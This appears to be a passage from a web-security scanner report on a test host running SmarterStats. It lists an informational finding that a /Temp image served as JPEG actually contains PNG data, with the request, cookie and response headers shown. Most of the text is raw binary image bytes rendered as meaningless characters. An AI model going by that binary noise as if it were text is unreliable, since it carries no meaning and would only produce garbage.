l?..[.A`..0.....w"...c..O`..-.....m...v}W.....}&...~....h....c.q..-.<.....{....[    `.e.M.I.z0K.e...v...I9;;K%..4..x.Q.Q..V..\....k....oz.....z...b..wg......}...[+/....vJ`;...v.~*..h..6c..|jv.F..v:.}..c.......K..v..;k-.$......m.."<......q.....?....&..... ............a.......cV\;l..Z...[....]X.......{.}.S.l.g.}[....n.....o..). .Ex..s,Z.8...u.....oN..j`...\;lo.......HM..4<qz'..?.....l..+..D.k...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+...?},E..6...*f..N..>...    ..${W`........JM..hy...?.....l..-..c.l...Mj...Y.......{.}..6....~4..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6....~..>.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`{[.a.6.lR+5U......}..c.. .I........m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O..&........h..&.RS.,Z......=.>...do.l..[.A`.Z..b.-.t.....{...M.w....a-. .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w.......h..&.RS.,Z......=.>...d.
lo..-. .I..T1..w....c..O..&....[r`.6.lR+5U......}..c.. .I....7....l...Vj..E.;]......'@`..]...sX.6.lR+5U......}..c.. .I...........JM..hy...?.........<...t..g....z,V.h._.-..'..`....W..:..!5O?....U..P.......m...yZ...v..|...E.%..+.}_.k...-n..}e<q.-z...?.k.{c?..i..>L`...........\......m..N{.i..<qzg..?....B....A/w.V.^.=......9........q..Ek..Cg....=.>. .-.@.5.^.}$..h..V.Am..hy..?....B...{k7.....#pm.....G.[....+a..m.{...?.........._....9....kp......N...-j..],Z...rD.O.......y............j*.[..    l.<..}_.8......{.}.!.[.....\..My.-. ...P.U,Z.Y....=.>.k`......Q...zs.`.....-. .Ex..s,Z.8.:..>...    X.......u.....OQ.o..w.u..cW..a{c.k....X.L..,Z......=.>.)......?h....7.=O...{.........w...m..z4.D.....H.}..c.......,..@..o.{...9.............9.....>.3...hy...?....B...?K.*..OL8..........}&......Z.A`..1.....w....c..O L`...D.K...o.(......$..Q..c......-.(.5....................4....h'......Dw....y....^.}./>..v.Nl......w....c..O ...-..;;l9..?B..M.....n.qY..D...-. ..h....E.;.......'p?....N.m=^..[.A`..0...X..q>t..}..c....6.8.f.K0..?.H.A`...6kX.......{.}...........(.-..../......Y...c..O..&.....y.-.`.Mj...Y.......{.}............p.5.......l..Nl.......<.}..c.................."=.....3..h....a&r..-.D.....{.@........(....7".....[..    l.{u..c..R..c...P...%y.q......g.r..}.N..1*\.m../.h..6F..8.O..y....=.>.p.....es.....-. .Ex..s,Z.8.:..>...    ..l;....K.....#.-..x.k`......u.....oN...6.J...K0..?y!. ...f.5<qz..?......-...]..%Q..o..u.V.....................r..o...R.....JM.......}..c.. .I....8...Vj..E.;]......'@`..]..[..[.A`.Z..b.-.t.....{...M.w..oy..S.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..w.....JM..hy...?.....l..-..Q.l...Mj...Y.......{.}..6.....)..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.........h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.w......m...Vj..E.;]......'@`..m.........6...*f..N..>...    ..${W`........JM..hy...?.....l..+.}].l...Mj...Y.......{.}..6.....9....6...*f..N..>...    ..${W`{m.k...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}..~(E..6...*f..N..>...    ..${W`........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`..?...m...Vj..E.;]......'@`..    l]p$.I..T1..w....c..O`...<-..4.m.|y~.S./.'.~lb\.....[.A`;.-..>..w....c..O`..m.....Ov.L..<.3....i.......cVl...s`.6.l=.f"wa..N$.>...    L0..cv......m...n.3)........[....}X.......{.}.S.leWm...ie.m?...b..w...I9;;K%..4..x.Q...s`.6.u......;......z........yw.=Z........C?.k......[...[......e....Y...c..O`.;l..Z.1....W...m.."<......q.    l^...N.....).........}..7.1...=.....-...!..h....'N.D.....{.....j......=....r.....861......|.6.l..e:.g...%.>...    L0...I`..#.m.....E......>.>...d.
l..;l...Mj...Y.......{.}..6......]..h..&.RS.,Z......=.>...dO`..#.Mj...Y.......{.}..6.....,..E..6...*f..N..>...    ..${W`...y>E..6...*f..N..>...    ..${.[..    lR+5U......}..c.. .I........m...Vj..E.;]......'@`..]..K~..). .I..T1..w....c..O..&.....H`.Z..b.-.t.....{...M.w../.;l...Mj...Y.......{.}..6.......>.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m..7s`.6.lR+5U......}..c.. .I.....9.E..6...*f..N..>...    ..${W`{.o<.....JM..hy...?.....l.=.....6...*f..N..>...    ..${W`.....m...Vj..E.;]......'@`..m...s`.6.lR+5U......}..c.. .I...........JM..hy...?.....l.=.....6...*f..N..>...    ..${W`{..=.....JM..hy...?.....l..+.}^.l...Mj...Y.......{.}..6.....G...JM..hy...?.....l..+.}....h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l.....h..&.RS.,Z......=.>...d.
l...[.A`.Z..b.-.t.....{...M.'.u...&.RS.,Z......=.>...d.
l..+..h..&.RS.,Z......=.>...d.
l/..-. .I..T1..w....c..O....8_..l6[.....|....H`..6...E.;.......'@`+i-.g...D....S...
l.....h....a<.5.h..|.,......'@`[.....]...&.....>....v'E.}.....OMQ....%/IQ..k/._>.Ia....'.g.<.]..=...u.......| .8v..x..S.q.....|..aG...z.;Q/.......Z..b..v....>=..E.}.[z..S.QBd..........r]..JX{.....r]}.J`..._.n..:.U..;_u.r.k;.U......p.\W.....y.#.F..c_%..c..p.\W............Z...b......>....,.pv}<.......g`@.....=@...7...O>9hz".]rFIt.Yo.`.......t...<.`..L6X...Q.| .;..6.....*-f.....g.9..(.F..a.k..}..p5..gy...?Ul..cO`[.....p....@....@........q...... ...... .........@....8,@`.;.@....@..........!.... ....6z.....a..|=.s_..........|s.f~...Z.....g.e..=......4z,..|.....9......m...<..{Aa..............s`&.....z}..%..._...UH..O#..._.b....N`.>....v.......|.@y.$...'._./.|..'..7    .....;.id.....;.;.........|...^..G'..o.....'Q.@....z.<..v......(.....f.u.%...e.........l.>~.".....J......Ey?...|.?Q....^._..    i.%Qv..5.....oN.4...r.."...T....}.?.a.2.{.t...w~.g......    ..._.d.._.....D    l.u.g.Z..6.h....un.U.....Z..:v.*......|..z%...a.6#\.].e..zk......ki......o.......;....-.......{..X=.y.@....@..J..[%.e. .... ..X.....9... .... P)@`.......@.....K..6.4.A....@...*..l.p.!.... ...c    .....<. .... .@......2..@....@`,...X......@...... .U.Q.... .....%@`.K.. .... .......J8..@....@.....lcIs...@....@.R..V    G... .... 0....z.....P.....IEND.B`.

10.10. http://vulnerable.smarterstats.6.0.host:9999/Temp/20226bc24c8e4c89926647164054826e.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/20226bc24c8e4c89926647164054826e.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/20226bc24c8e4c89926647164054826e.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:59:29 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682F8851B980"
Content-Type: image/jpeg
Content-Length: 19860
Connection: Close

.PNG
.
...IHDR...l...........h.....sRGB.........gAMA......a....    pHYs..........o.d..M)IDATx^..wx......s..s...;g..7..18.>.L."G..1...&..E..Y.@.....$rFd..B".!.I...........`.u.*.........U]o=.z.t..{W....Z.-... .. .. .. .i.oi.uh.............A.a.............    @.i|..<...........`................`....y .. .. .. ...9.. .. .. ...'.....B.@..@..@..@..s..@..@..@..4N..M.............................h....................6.............8..6...... .. .. ...l.. .. .. .. .q..l.. 4..@..@..@.. .0.@..@@%.....X,.Yq*uj:.:.,..c    %...e.gI........Mm?#,K...y.*.)7....@... ....lZ.    ...@@.......g,..8.4$...z..J..........,...$........:....t...m..`..8.. ...@..S..sO2.YL].0.WL.8..%.W..K.0!.L.1..+..T..=$.&{.m.F.y.....C..L...........L.....U...!.R.V.(......c.E....y..[Y.....7........*.........6.p.S@..4H.......=.n....jek...O.`.'L&..    6Y(............6.24    ..!....G...@@g.^.......~.M!O.....x........V.
M5.F..P ...0... ....l...g...h....~...6{.]B.    o.<.Z.Y....e..L".....Z.......'_.......-A@.. ..1.h.....    ../&y(S...&.X./.B....b..{.....Y..l.#....#.....As@..|C`.......W.fYz...R5;...    .2!X.....y....W..7..-..`..(. ..>'.w....q.....A..@....l.P.5 ...'0c.YJ8rU..@.@...A......^...X..p(.Eq.......@..a..F....    p..'.......=..`..(.. .......\.............F    m...P...p...@...B..M/#.v....F....D5FnP.~......x.....    .. ...#p....6b..........=..l.. ...#.q..}...............~..-...p....<
[w...q.............. ..~&..|..p.....^.@..e..N......K...'o.v?...@...M.....q.......k............^F
........v'0...SxS..Gr.I.6
.J....Q.......6....
..!p..D...EX....x...B.........Vwb2......M.'][....4x.t..SvS....gq2..:.....@...D..MK......    .8.;p....K..m.DT..;.^.~I.5.....W....^.../Q......LI..].!..B..f!.=G81.e.....6......N...SJ8rU...?(.T.M=J.br(x.5..2w.^...f!."......<qh..O..}..?.....`..`.) ...x..gd.[.N..]O.Fn...G$.YH.m..4%...q.....V..b.E'..-.g.....".....@k@ `.pB..4..5.r..D...+.u%...8...7.o.......@... ..j..`S.(....&....i..,...F....i.Zt&|....s.H..X..xC......:.x........ `$..Q..J......4#.:...B....,PY..`.$
f..........C...;\qW..x..n+v.E.>b..].....S.f.8...T......!.@......w.@..C....    .P...M..Pk8.._..uZ~...d).OV..MPrrE.Y......P&../....n..`s........b..%.,j.5.q....,.X...L.f.....D..u,..;.c.{5....O;@......9..O..'*p...n\.......(!..........`......7J^"o$..8k...$....Y..T.....v.G....c..%N.$dbg..._.:.(%............./.>.!../...3.S.Qk...fZ..#VS..].6.........I.II.s......... .....BP8..D.Cu....qP..'........o.B...G....]G.#EHXE..^K.3....X$......k..l.. ..f......4T.V.g...$.U.AK............t.....f....c.z.. ..r..l.. .......=<Mf..8..i.UiA..+...E.0...8U.,.oF_s4.mx5A..~'.......'.^.>..J.cz.u./...a...kF&H......R .....D.A@F......L...5...ZD...3.f^&...J
{.J.....ZL.k.Wz.*.m.~A.u..`..........n#...N.O*.!2'9....`.......O..Q.....=...
......<l..w........t)..nM5...?<."......Z.>.Q..=...wa.+.....q    @..w..s....(..7.{.-.Z.%.....5....=.m.N...=.mc.P.q......_t... ..=.........z.;..|WC..W.....R.!q0.....@,.]..>.C.....CW.4..U.06..6c.?zo.....S.I.n..eo.'.."z...x..w3J.OO.2|... /2.ih..l..~t....&.P...\..t..&.J.k.`.e..x./.vy......>.J.h3...>..........t..VeR.Yi...S.g.a+    .;.R6..?..&m.......{................T..".PY...\..7.U..P......2....Vb..A...;.~.............Cd...e..h.&i.....x...5.UO.'.4.......N.; .. .0.@ ...Xc/...\....
..Z#...i.A..G\.G...qy.4<..-..kt.. .0.@ ..p...1qhL.X.$.P...'.5.6.4....6...z....(#.........O..p......L.)..Z...p.n.eW..q......u... ...l..C......tj.uF..z....d..j v-......uU........./    ..?..6..!z`p................-..S0}1....:.*.y....3........    @..{..z..HH..k.a.b.=4...pL.L......[Zqy......@@.. ..;vh..    $..M..(.k.#.e;..]..9....Z......... .O..l..7.......P.."{pu.".f...?...a.n.9E.o.......e.5......>    @..s..j....?....J.w...Y.P(,..p..+.....Tg.
.....].1..6....nL.=...V..+.k+.....
..(.!.\..
.....@..O..M.c......CW...TEb.....l..b/.,..4...:    O...+..,..M\w.@o..
..'....1D..B..uk..A...!..$VyG...QU*.8a..Wp........>.    .48.W.....".Z....{T...D.q.J......S..].>......>.    .48.W.....8D.3&......Y....!..;..v.. ....l..'.......S...E^.^|.d.v....R....4Z.....0t...A..M...V.........N.W8_..9...d.{.......u...H.sh..Q...w?..-C.A@.. ..1Nh.A    .I..&.'.....}T*.......".)^..bA6u...F.5.n.....N.
.4.........).k.b...*00.........^...q..f...EC.A@'. .t2Ph....bp^..,...oq(.i.n.....JwB..;..9....@@{. ..7&h....D....b.Aj......s...)-..|.i..<.o ....    @.ipP.$c.p%.........Gs.m..u....0<..q...h..........R.h.9...../.....9.4k.yT...>.7..@@c. .46 h..    ..h.f^.$.``.d.pA]..;[.    /.....{...`....e.$....5....G.....j......&V".P..._>...    @.i~..@....kU.o$.d..G..$.-i>....\..-.....n+.m.&..#9...... .y..l.."4.(..z.....2Ca`...P.m...5.7......lz.).3.    .|.+.?(..wmu...q.Z.H...[s....2.......:.3..l:.0470    ..\....:Uq.T.....'s@...UL....70_:.
.tF..Mg........U......    w.Ud...y.........N.......}.......~..-....y.D..'.....9.v.iE....y}%.......`./<.....-........s.S+!.``........|p.2..dO0.......`..{<...-.x+ g?.\.....00Pu.._..t.......    ... .?..l.c.'.....EA3...h..:!._....s...1...Hg............`......&....N.BV........s....N........l~...Vt...K......t....?..t......_...7......Y'h....~c.u../..6....L`..tj.y..`..*........xm.(I>.."..#...@.?. ....O58....2t...;..1d..R..../..../8...'....t....o/....!.....x..    .;W@...;....RN8...W..|'.^!..lQ. ..28@..|O......D......yT.C..IB!..?.m.N....s@..........x.A...@......H..B.....D8T.l00.....4.....l.Fn..GO.............q ..X.g.r....|1..-<.H.5..F../.E....1..6....@ ..U..q.i848.,....s.s.-..Et.....!.....x..    (Y....|.C.gA...PRD.{.....].+..6.....H@.........``..9.~q.S...{..[.}....6-...`..J..uXr...d....s@.......>.......`..k<    ...9g.....].y...e.(Y..%i8....@.w. .|..O..E...........s.w.p..-......|O......D..xo.j.M.9....".`.Z"...c.(I<..[i.:..o?..mF.A... .|..O30..J.i..f.mT.......U....D.&..D\...$..    .........<l.y....H.=....:......oy.i.&...=tm..D....hL;Z....;.....D\....N.v.;.05.s../..x......du...h..i.......JC.}L......8..(::..DW..lr...uG.:....M.....O..........WR.1..NX
5.+..Zx.:.^...W.....&..h..t....9.........q.%....=...P.......>....5..3:P..^....o...%}<"....P..'...s..A....9.d#x......./4z..>&...c.x.q    .....%.p(.^nmL....n.lB....D\......E....j..W7..5..N....'......9......h........}..s..1..6.....K...._..9.l/.`{.....$.1..
...>...B.NYrC.ak....T.Qj.uF............xP..jz..W....9.......a.Q.%...c:=....5^........lj...6.......J...1'7...U$7..D\....)....H.`.6r3.<zj...=.....`.!l<....?......T..}s#z..7vrQkZ;-..qr..q..]NUDrC.Q....q....vK.Q'Q..f<.(.a..+.\.. ..9.hU..xz;.rg.I.`c../......lO..{S.a3...w..uq#Er..q.ErC.........>I(t..{.......i..l...4.P...l..y.KzpH..-.5g.......4E...F.I....a....Lj.}.x.:,p.(.l...(.P....@..a..F..x..D..+:......8.@/.. ..&w...C)...........vR.i..bA..............;t.[sB..':..z ....QB.uO....tw..N........iC.S...qC..X..E..u<.....F.
.w.:.]...7a.g.d......W.:.#..l:.,4U..
v.....u(.~...W....]Z...ft.)..%...\.......k:.,..."..-...(..A...;    -....6...Z.C.Jv9.../b..#....i....!D\.......e.ITO...d.)j.8........I..br....:|#.d.....6...Z.C.J...%jT.vC3J.....>........1R..I{..Hn`....#.....o.49.    @.....o.!.T.qX.f. ua;.......MA.K....I.z.w...c.r.(3..6q......    w....~....AC.@.............e=8,
s....6.zz...:...Pe`<...E..;
S...4.....v..Q.o.._0....@..........R.F......;.
.Z..9!4....4..M_.@1..`^f...M..`h..........].?.e.....b.>......).B.B+....H.)....S.O....@..<$...!@\..J.(.l....n.s....Att.?Pxfm.8..-...eo.L.7W.'.R............`....a.D@.`KnE.s.AK............:M.H..4....gyM.....jf_.....4.........`3.`...#.d.....7B..\g...-3.M.kl=.U.5...]..........Tp..en.B-9....'....... .....@......'..i.s........g.....$....E~^.....
..-<T.^.....4.S;*...p...l.2.?~<.........~p:&8...L.................ma.0..V
...P.f\na..;k..A..O?..m.......;.f...1..]..?.......Z.h.%&&Rff&....,X@...>{.. ..#..6=....;.%9[)o^..{.Ju....\``
....bMf....>...u!..v...C.........b.en.@../s8....OQQQt..A.6/.6.6.}...~ .....x...<..A.3..\..mGo`........P....4.r+...jN!..)...$.*D[\...(...l........R...7..?....EEE.h..y3.8q....%.I.6.}'.....`s......    <.w.r...s......aN........m...k&..qZ.:.Y.Y.....UM..k.:........o......./..B.6m....JKK..'O..0`..L...1.k.\.V..F#..f..G.B....tz.?9.l......0'..,.B.g.;.....u...m.....w7..F......Z.......t~_.....a....|.....;w...........<4..@.....;.%pr.?./....6.....N0..~..D
.....f_    .k}VU.E.....=.v.[7)4z?...l!6...zR.]G.?~..gZ.r%-_......is.i..M..Ih...@..k..Z.....>=_W..`....:..1.B.C.Q..........k...U).gO.;.....}y....c~;Q..".g.:,.{..y.7o........hS".....`. ...    @.av.....%.P..*N.[K.].....a..B...\i....4...+.!..m[.."4ZUx.>qh....v.....a\.#!!AZ...m.k...C..?N.'N..[....~    @..w..r....w..-..X..n....l0x....
...Ls.vpj.gZQ..w.F......qq.Eh.x+zq.S....6..GE.}1....D....SJJ
.:u
V...`.r)s..........    @...9.hP....6...O..v....&.
]...E].....L....S.._..."4....zy..S.Yx......vk:,.Q\\,..HJJ.`......N3Dw..!..... .....f.........=...g..uZt.3....%.P......:.d...O.z..._}e..6.G..5.`........<.O.;k...........X.........~.zb....@..s..4A.../....A..h.X.q..C.`e....    ....4?..Kb....K?....S..l..Z.^Rh....",.M.=..    ]<X..S...........-[ .....z.jJMM..;.F...    .....A...@....Yb...)..`RX.T....=.h......M5i.W5.f..v.d.Ne............o.HO........v..]*y...9c(S.a[.l.egg......... ..&.......;.....:    ..M.Sz.....vgI%J..g....-.{.1}=.C....C.*.F.#k........>....t5.......]..m.w.6.`..Yg!Q^..[....@H.s..4C@.&.R........6.B../.....n.....=.=....C..B...-....`3    ...M(sG...v..Giq=..`....m......4$..................q.x.....^.5...P..=(&....}.+q..........KC.E.....BD..w.Vv..    ...!...r.....X;{..S..Jz....-.?..6...Z`0....Jn)......d
....A......#}...A....&...-...n....R..G.v.<y"..].n...    Dc...p..m.$.#...... ..3.. .*.E;..jJoR>.7B...~..B
......b..^...u_..[B.9.."4..V%z.%v@(..m+..A..}..]_.p.p....{......)...../.>... .....sF8..T%.R......d...F'&./Zt.)-..S.......S.n.....?    ..!U...>........kS........{.m.m...
.S.!...C....._....*...@.Y.K..~...........mKt....."Q w.;..F/.l..F4zD5.=t.b.$
..../.[_.......G.z|w..9..v.......0b .7g.P....k.k
. ..6.
....r....k.;.m."$z..!..M.........X...M;..>...b......*]Q....~&...<.........{...b..m.3g.......?.[.d
g...\.5kV....!..D..M%....B..H$.Y....X.&..|s._....?.B.K....7.P..]..:N.@..s..?.D
...._5.s..Tl..%..N.....?V.X!....pS.p.q.F..y.+....C..`3.....".SI>eM..s.[r+.c.......B...]...W,d.;tv.WT0b.K.Id..\..^=...=/.B..x...B...e.6o.<:|......LI.\..^.v._. ....#....!C...@..?.O..8.mo...7i....oi).Bc/..b..W.GTe.= .%......,..hIVw..m.....X....a...~.A*..v.Z).T/.6g.P._..o1.... .|I.......a......A.i...%.BcSZQ\~_....Z../.
F.r..w.T.F?.b.k....=D..w...H..FZZ.-X....;.yO...k{....(...... ..... .*.W....    ....F....Z!...0.h.....G..Q..i....`.h.,.A-...L..........cAR...?...c...R..^.u.......k\,...#..O....:...@.a.O....6..WUu*....Fo.....Md......7.x.....>.+S..1n..!C(......_...C.bO.t.....'...\....FGG......6%.......a...... .....2N8...B@.f.b.*I......../)c....i.h...^........T8v..vL.F7u...k..f....K).).p;..?
..)22.v...)O..phjj*.`....p..1..o...W.ap.@"...H......o._....L.l.r.e....e...    .ys.{.fI%......7...3......%5.M....W..{...t..-.....v.4...b.qqq.e4..&U..ARR.%''.....Z.o.{.R....6v..+X...v.......j}.y..j....    ..6.`.C@.<.....S+.|d%z.[..`.%>....w{....
..5...}n%:8......m.E.h\....^..^......=....~..\.tI..q.4''.o..QI84**.x;.[....$.....%Z1..+.[.$.,E......L.....q{..&...9....N.....6.~...,.`.(.+..}.1R..[j_)..w,.V...S.........L.........~D/......i'..pTl......r..^....v..Y.........
....8.....&..........7...J....7}1.ucc)....['.L.7[....t..&'..+(...........#....1.Ztsq0....-^C+.......3-..#.y..Y(.t./.'..tq?K.z..~7..E..V....]o...J6......Y..;}.8..>X..a.\.......M.s.......f:.-oM......mOk...D'F..D.9..vIeJ.=..6rWc
.Z..N...I...V....>....#...O...8.....4w.\)....MI.\w.C.".X.X*.3..!.$.S.d......f.\.g.,...I..]'.a.!Q..3.;./....7<.*}.6.. .4:.XPY.3. B......7....j..../,../..s.._V.I.M2.'......L.......?...~O.:[...m.=e...m.`r...?...h.Mc..{.l....R..w..v5%:.[..1..g..K..5......u........=..".4.....P.e.f..,?..T...S..{........o.x..O...*    ...=..}....o....`..l....l.A...L^:......G9q%..$...h..........'..k.@....PU.%..+...m)hH.$I.....}d(%...y..8[.....l.C.h..O........|&.]&H..P...my.....%..m.....p.....tvz.i...Wsv(-.A..-s4...M/.[j)..2...k#.b1....S...aa..Q.5..WU....S{r..en..]_.pJ..6...^7o.7%.5o....7.<./.J<5..U:...9.l..JK...D.#..C.f.~.    ..~.B.Pn.....9.._.;z8.....w1".M..n-.D8.....|.z...e..r.>['..SNP.....$......}
..1....C.%oZ^...}.a.n...=tm....l)=.N.....K....U+....Q~..io...p.lm..tys{zU<.....h...DY.Z8,....Y.....rss.b.zU.]....ek....v.c..Ki....M&.-....M~.....5...H....p=..y....d....]9.&..*..9\.&.\..P.z5.H..)+.b.>../[.f/..d...Vm.tPl\......5.l,..=.g.0..Z.E...@Z.v*T..tcS.?.SR.h.[...)ml.'.1j.u......wF
...s+..&.TtX....rx...'.pV...%E.    6..6m.4w_..].Q.....Zs...Sz?.<l.a_.a..<S.`.6...q.).i...`.<B.......z}Y.n.    K.N,.O.......Z{fKLZ.....V.........x.c;5....'.@.8......r..v5%:.BoN.j.~=:......:.S..1~.>q...!....ljY....B..L..=/.EY{...........KEj..<...M.w->>^.u.<d.......&
~He>8+...M..<.S..L..M.,G.sA........W......`.....$..Yfh.y......D.I.X.%..6....O9.r..d.J...2K.\.V.ti.f.B$...l..n.4=.R..g..h;..D.]m...q(t.(...p.&l.. ..uC*...5m..k......6.ov7..Q......\l......../_...x...?N."...>. .....`s....,."..-..N.Pr..fG..zf...Y$:...r....6...@..%...R...1.3.O.....=m....IB.i..nlF.........M9.....JE...jyb.....+2F.M....p......g.:,..Y.......4...'28.....;.....^ `$..l..m..-........md...:nr...u.,.....v.DKK.8o...]4.`..e....mGzsj".9=Y3.[. )..p..!.B5c......".r..........czY..w.y.-........a..?.._/.i.r..Kv..i....k3g.$.....@.3..l.... .....p6..(...h.....    ..    .xm..)aeM.P8AS.....8...    ..[].:]..U..p..w..)s.{t.b..9.^...h...JE...k..y...75(..6..<..}...-...3.. Sb.#...J.~6S(t..I.E.....L.G.E.W.......[..~w..~..W{.(.~..@.S.Bg.6pX....X*..e...z..CcQ.d.wx...............5...y...........!...~........&e..bm.&..%.h...T$..7,.k..=..X...W{q.;.(h&....t|...A~..7.....nLL...7{.M........p....C..M.....x..K    .....Pw!....DH......5.h..0....)jh3*.%..e..~,B...`...{y.Y..D...Ft.`%.9..a....B....L`-.....D....k........... ..:...~...7......E9tz|(Q.t.......)......i.t....S...M..e.'N,......g..xo...-.    6.p+:....UpXl..p.]....A.].&..D..t.........`. ..6.........e.z.~.PG.hKn)B......>..i_K..u......i[p.K.br%./.Zx..w.*B....m..-.^.    .+.L.... :..].;=.a....eo..........k))).5......-.6..6m..Z....g..Q...T&..............3S.P..5h.......P
.Z..GEy.V.....=...Y>....:.k&.....g*....-...\lw..U....B....wU... ....6uy.n .5...F.h.sb.....j.........:M.Hy.......jWBC).ae.{...-..U{Y..%.v.dui;+.GFF...ad^.fO.m..U*....@@}..l.3..A.k.....oWWW.i.......!..a.....
..3\7b.....?.}....!..m.?.....'<l.^.....$...R.2.Wv...5..<y"....Pk.....{...z....N.........._~~J.3+..M....7..hc..=G]..;..&....f....k@.F.....z....f..L.S...m.........g......]....\.#J..y#y.p..............6.p.]A.k.x=[........)...b.UQ...<..qb.................u..Xo...:i...V..Q.1Z2O5{.p.Kb.......=.....YTT$.6.&..{7-]...{.. ...    @.av...    <H......{... B.I^6!.<..G.R...I[....Xc..u.K.;.
=..=_.!.5.wD}zU....|..;J..*.[....P....e.6u.T..Iq...x........ .U..6~A.,..5..{.^...e...../%.oN..........S........D..44.O......o.9..fK..n.Y....nM.$..m8@...K....|qw..*.+K...kj.(.. ...m{..H
.&...kk?....,.obc}f...KC..#...h...0._.5.S;.8.O....7..........q.....NB.._......h.a...%{.:H
.n..G{.D..z..LG...b....v.G7)4...B........&/...3...O?..o... .....`..!n...%...{.;..K.......N...B.)2.........[....uo......]..e.|j.E.ve..t..0z.$F..D..{.\.k..zfW%z..e.NR<..@.c..l.#.@...L....-.5O[r+...D..9....P.....a..m)|tC*^...v%,...*..o.;.'..........&.|.;.k.=...P....*.q...?...3(7..rY.    o...B.....:*.
......i....as......Q.....v....|..lK.........{.X....!=.....-...P....*.q........-....79.....K.Y.....%..L.....%..R....".X >.k.V..&B.#EX4....w9...nM.Zk...h......`.<...#..h.[Y.X.F.E..2+N.G;g...x.(.lOQ4q....x........wK.oc...>.{.La....Hw.....Fw@.. .0.@ .    x$.v. :=I..e.*m(...B......,    8.,....3...Z.7;.....6._.....g..h'...'.d%@............8..%.0...6..=z...L...}G...L.._
......>.H...6......^.7{(..Rh4...(l..X.....A./>!.j.
.h.....3...6.9:l$.,.x..g.5\.....xy..2..h..0Jy.4 m....9..=JH.......t...uK.}.[G*....M...f.7.}5...6#.2.hh.Rq..5.$..b..jK.::..(.Tm
.....w.Jy..&..lzJ7.3..=^....k.
G..k..K..~-:.!....7.....Lr-.;.@....G.....[.(............Hw.WQ$....+.^..$.L.....n..C"<.(.muN(.....b...)t.sg.Xc.v.];...>.O..H......SZ9]...........l.1....("P.2.....j.P.....kr..y5X
...f..m....qj.z......g~.^.B..a.?3.6.UM.s(........jf_...C.)z=p..h...........    .do.........R...~..].f.os.v..w.).8^..2.]Q.d>=^..k.._..2..P..6G.Q^.....=.Otyb@.........@.ij8......4g.GT.[."Dzv....-.8.kr....-w..Q!..h}bk............(.5`.".f.m.B..2...]..%..2c|&.J.P..    t..q...\'2h..`.,q.w8......[`./z...    ..=.rg..8....J.a..].kr.6.Jk.P8...W..F.oF.CC.d....h.L.. .).....<4.....~..N.U..u4.>.m.l.....    @....7..}..=H.F...Q.
..4[g.....Q.m1.{.F.6..g4i|.z.i.GV..H...).kW.<j....F.Nz..o.3=y......hS"....    .#....A..........I...."...k.........7.[:G...2A..U.....\'...:3\...G....4{m....E.N.q..f-.._.L..L....*.......?....]7...?g....J.;uRE....i..67h@.:./...$..hS*.."..S...N......VljQiw...Y|...wa.]j..~..Y..!....6.8.....S....<'...9C..........i.}..6M....p.. q.}h..i..(QS..p).L.HO.lQd%.7...s.`.0UE.....Q#ZU.........k.M.`..s...T..H.    -.`.s..}3    >K.W..+....gfj.W..(S.7i..u......0.. ..`.D.... .....9s    u..J...PM...o\.7.`4.}0.2.'..:M.H.kW.....4^..@$.xK..X;..    ..Q.2f..D.=...d....?.@...x;,.PE.....S."......q#db..w.7!.L.N.. .|6.. ..@...W.@.....o)|SO....a.i......h}.x.s..v....ZP.R......K....T4}:...N.={.....^-.uk.(..[.u.....d^.....*...2$j......Y...T.i.B.e...~....@F...7..6}..Z..^'.a.....~I5)....l....|>.J.Z.......m......(.......,D..k....M.f.>^.gr....-.
.U....Tu.
.>).<..(`>.E..z4.!....,...s*.l.a..P.v....C...=.........6..6o...A @.....z..I}......{.....u%.%..N."....\.u..N.......>..D.qB.N!....I....../.d....$..Y.2....e...gr.....p..DK[...    4...{..%.....i.....G...........,kL}W.W..).y...q..*...hA..6....S...>]...)......A...h...@....T.p.y.._.mj.6.e.5.....c..S...\...]...S..@..."....6\.. `"..m....m.G4`ku..sSK....~..t.C.*.......4......t..9L..........G.p1....@....>}......5i...U....@...g..QrH#...I.q....?......F..41a@..@.-..lna.E ....\.w....F.DV..KG...y..;.
.w...`...C.#...d.vp..s.g..    ...5...P....j(q#...k.\...KC.}J.g.K....~[>....[..w.G4....
